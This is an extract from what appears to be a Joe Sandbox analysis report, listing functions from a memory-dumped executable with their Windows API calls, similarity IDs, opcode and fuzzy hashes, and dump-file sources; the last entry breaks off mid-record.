                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Library$Free$Load__wfsopen_memmove
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1396898556-0
                                                                                                                                  • Opcode ID: ec1db0797e7286ba510c6aacc97b69e76fdfe3443cfe3551011bc53b1f090c04
                                                                                                                                  • Instruction ID: 7dbe3e7ff1757a06668b1aca139c187c893b1c5b3944673b7558a14feffa1500
                                                                                                                                  • Opcode Fuzzy Hash: ec1db0797e7286ba510c6aacc97b69e76fdfe3443cfe3551011bc53b1f090c04
                                                                                                                                  • Instruction Fuzzy Hash: 0A11E371600309AACB20BB74DC42F9D76E5AF95710F208829F542FA0C1DBB0AE41AB51
                                                                                                                                  Function 00F1AB2A Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ClearVariant
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1473721057-0
                                                                                                                                  • Opcode ID: bdf594dff2ebd25cc49325b4797e55eba8df379f1719754da890a62621430eea
                                                                                                                                  • Instruction ID: 7b146d8bdecd6fe4853c8c992f779db1b746757237f8ae95facf8e906de66773
                                                                                                                                  • Opcode Fuzzy Hash: bdf594dff2ebd25cc49325b4797e55eba8df379f1719754da890a62621430eea
                                                                                                                                  • Instruction Fuzzy Hash: 08216970508611CFEB25DF28C444B5BBBE1BF89304F14596CE9966B262C731F885CF52
                                                                                                                                  Function 00F010E5 Relevance: 1.6, APIs: 1, Instructions: 57libraryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: LibraryLoad
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1029625771-0
                                                                                                                                  • Opcode ID: c2d59f3ec02a7e53583ce062671301de5179d9fde2d3f147f1ea4c248ccfdbd5
                                                                                                                                  • Instruction ID: af8ede818409820d90155b7ea7764dfa8a2c3bf7e8f43ce49fb51a89a34b8b93
                                                                                                                                  • Opcode Fuzzy Hash: c2d59f3ec02a7e53583ce062671301de5179d9fde2d3f147f1ea4c248ccfdbd5
                                                                                                                                  • Instruction Fuzzy Hash: 101151367012159FDB24DF18C880ADA77E9FF49760B05816AFE459F3A1CB30AD41AB91
                                                                                                                                  Function 00EA4CA0 Relevance: 1.6, APIs: 1, Instructions: 51fileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • ReadFile.KERNEL32(?,?,00010000,?,00000000,?,00000000,00000000,?,00EA4E69,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00EA4CF7
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileRead
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2738559852-0
                                                                                                                                  • Opcode ID: 8bc2610e7010c6338e55b5d973c315a936e69390e6606edcc8cc0c374456f7ba
                                                                                                                                  • Instruction ID: 6a978b142eee14aa042beef378cec26adc617b594482c1285f7cb4bc14b69227
                                                                                                                                  • Opcode Fuzzy Hash: 8bc2610e7010c6338e55b5d973c315a936e69390e6606edcc8cc0c374456f7ba
                                                                                                                                  • Instruction Fuzzy Hash: 14113CB12017459FE720CF16C880F66F7E9EF89768F20C51DE59A9AA90C7B1F845CB60
                                                                                                                                  Function 00EA4D29 Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _memmove
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4104443479-0
                                                                                                                                  • Opcode ID: 8f18987bb35b2baff0789867a32b92a27879a4fd73e9d049a8f42728d02b6011
                                                                                                                                  • Instruction ID: 27c51c9fb2f408b85551dc9419d8aca859e46891ce67e3688ea8113f5ab65870
                                                                                                                                  • Opcode Fuzzy Hash: 8f18987bb35b2baff0789867a32b92a27879a4fd73e9d049a8f42728d02b6011
                                                                                                                                  • Instruction Fuzzy Hash: A1017CB5201502AFC305DB28C991D39F7EAFF8A3107188159E429DB742CB71BD22CBE1
                                                                                                                                  Function 00EACAEE Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _memmove
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4104443479-0
                                                                                                                                  • Opcode ID: b5c2f79ffc866aa4d9d8d5862c779d30c68016984ecab95dea654ca3aae33fc1
                                                                                                                                  • Instruction ID: b8031ae2dfad5fcbf856f766162fe0cdbe48bf8b55cf9fe369ea29f96a44ea12
                                                                                                                                  • Opcode Fuzzy Hash: b5c2f79ffc866aa4d9d8d5862c779d30c68016984ecab95dea654ca3aae33fc1
                                                                                                                                  • Instruction Fuzzy Hash: 2E01DB721007056ED3149B38CC07F67B7D4DF49760F60992EF55AEA1D1EB72F4008660
                                                                                                                                  Function 00EBF2D0 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _memmove
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4104443479-0
                                                                                                                                  • Opcode ID: 02776e319c847e67457d139bf32e2937006cb129a4eaf7d285538e405d1422c3
                                                                                                                                  • Instruction ID: 611e8c83b1b4cf0629ad17608a663bc999f01bd1a9564a6dff78db9a77fdabed
                                                                                                                                  • Opcode Fuzzy Hash: 02776e319c847e67457d139bf32e2937006cb129a4eaf7d285538e405d1422c3
                                                                                                                                  • Instruction Fuzzy Hash: 7301D631004601EBCB20AF28EC41EDBBBE8AF96760B14553EF89877251DB31A95187A1
                                                                                                                                  Function 00EF95AF Relevance: 1.5, APIs: 1, Instructions: 29networkCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • WSAStartup.WS2_32(00000202,?), ref: 00EF95C9
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Startup
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 724789610-0
                                                                                                                                  • Opcode ID: eae81d7c25ee78184e2c700dd5cd01bdc94f591e66533fe3cadc7a7884934da2
                                                                                                                                  • Instruction ID: 56b5f4f1075734d0dfe6d2c5d14e1f7cbe7d18d793921b18c6e1492b3388d3fc
                                                                                                                                  • Opcode Fuzzy Hash: eae81d7c25ee78184e2c700dd5cd01bdc94f591e66533fe3cadc7a7884934da2
                                                                                                                                  • Instruction Fuzzy Hash: 56E0E5332042186FC320EA64DC05AABB7D9BF85720F04872ABDA4872C1DA30D814C3C1
                                                                                                                                  Function 00EA3E39 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • FreeLibrary.KERNEL32(?,?,?,?,?,00EA34E2,?,00000001), ref: 00EA3E6D
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FreeLibrary
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3664257935-0
                                                                                                                                  • Opcode ID: 43e54b23e6e2f960aa117336919cfa10d6cc70c81a94d52d25213799ece0bb93
                                                                                                                                  • Instruction ID: d2afb21f1cd4caa91ee780ee9e0627796a4f19662c20140c3e9f63285d30d039
                                                                                                                                  • Opcode Fuzzy Hash: 43e54b23e6e2f960aa117336919cfa10d6cc70c81a94d52d25213799ece0bb93
                                                                                                                                  • Instruction Fuzzy Hash: 41F039B1101741CFDB349F74D490852BBE0AF0A719324DA7EF1D7AA621C732AA44DF00
                                                                                                                                  Function 00EE79F8 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 00EE7A11
                                                                                                                                    • Part of subcall function 00EA7E53: _memmove.LIBCMT ref: 00EA7EB9
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FolderPath_memmove
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3334745507-0
                                                                                                                                  • Opcode ID: 84f777dadedbb5e4f846ed3a2ec4a7b898ecf537d80a5e149e54a5a43b2cc4c1
                                                                                                                                  • Instruction ID: 96b10292dad0f078318e01502f6c96ed871cfe0b95a2574552be046c295a17e2
                                                                                                                                  • Opcode Fuzzy Hash: 84f777dadedbb5e4f846ed3a2ec4a7b898ecf537d80a5e149e54a5a43b2cc4c1
                                                                                                                                  • Instruction Fuzzy Hash: 4FD05EA650022C2FDB60E6249C09DFB36ADC744104F0042A0786DD2042E920AE4586E0
                                                                                                                                  Function 00EE6852 Relevance: 1.5, APIs: 1, Instructions: 19fileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EE6623: SetFilePointerEx.KERNEL32(?,?,?,00000000,00000001,00000003,?,00EE685E,?,?,?,00F14A5C,00F3E448,00000003,?,?), ref: 00EE66E2
                                                                                                                                  • WriteFile.KERNEL32(?,?,00F622E8,00000000,00000000,?,?,?,00F14A5C,00F3E448,00000003,?,?,00EA4C44,?,?), ref: 00EE686C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$PointerWrite
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 539440098-0
                                                                                                                                  • Opcode ID: 1b221f58539786b8a87c8b6969e25d16513f022c3b1750d3f49ed6e84fc9bf71
                                                                                                                                  • Instruction ID: 03ebf3b6c075f0352ccea2f2fdafe89d22545b92d65a9cdf491bde0639547d5c
                                                                                                                                  • Opcode Fuzzy Hash: 1b221f58539786b8a87c8b6969e25d16513f022c3b1750d3f49ed6e84fc9bf71
                                                                                                                                  • Instruction Fuzzy Hash: 1BE04636000208BBDB20AF94D801A8ABBB8EB04350F10051AF941A1110D7B1AA149BA0
                                                                                                                                  Function 00EA193B Relevance: 1.5, APIs: 1, Instructions: 18windowtimeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00EA1952
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSendTimeout
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1599653421-0
                                                                                                                                  • Opcode ID: f294a8f8db21322da60fa20d194ca78e16858fe681584d26f6441c8f68c26a25
                                                                                                                                  • Instruction ID: c5ee0b9312bc5992d12034ff87f439094411c706170ca1f73f90417635b9d4c5
                                                                                                                                  • Opcode Fuzzy Hash: f294a8f8db21322da60fa20d194ca78e16858fe681584d26f6441c8f68c26a25
                                                                                                                                  • Instruction Fuzzy Hash: 88D012F169020C7EFB008761CD07DBB7B5CD721F81F0046617E06D64D1D6649E099570
                                                                                                                                  Function 00EDE390 Relevance: 1.5, APIs: 1, Instructions: 16windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EA193B: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00EA1952
                                                                                                                                  • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00EDE3AA
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$Timeout
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1777923405-0
                                                                                                                                  • Opcode ID: 34d7149495f7dafb2699f3227297803efe1bf4dd6fa35e9ff9f3dcc02b7ee0f9
                                                                                                                                  • Instruction ID: 7e6d3c34d826c7666e6c08442bd8d9c79e66398cf835e3f053d1a05a5dab9d87
                                                                                                                                  • Opcode Fuzzy Hash: 34d7149495f7dafb2699f3227297803efe1bf4dd6fa35e9ff9f3dcc02b7ee0f9
                                                                                                                                  • Instruction Fuzzy Hash: 9DD01231144110AAFA706B18FD06FD17B92DB45750F11049AB5807B1E5C6D25C429580
                                                                                                                                  Function 00EF6FC3 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: TextWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 530164218-0
                                                                                                                                  • Opcode ID: 254905ee673db7b25f551ad573df7d57c219e146b1ea44237866eff4c162fd77
                                                                                                                                  • Instruction ID: 3736662be4bb85366113584b4e3676ac8a9eb005f5c7b068ec78d7bebcab34c2
                                                                                                                                  • Opcode Fuzzy Hash: 254905ee673db7b25f551ad573df7d57c219e146b1ea44237866eff4c162fd77
                                                                                                                                  • Instruction Fuzzy Hash: 9ED09E362105189F8B01EF99DD44C86BBE9FF4D7113058051F519DB231D661FC51AB90
                                                                                                                                  Function 00EA4FB3 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?,?,?,00F149DA,?,?,00000000), ref: 00EA4FC4
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FilePointer
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 973152223-0
                                                                                                                                  • Opcode ID: a702202ac1931c470af972924dad817cc0d936b03bea9a3a7fdbcbec801ec150
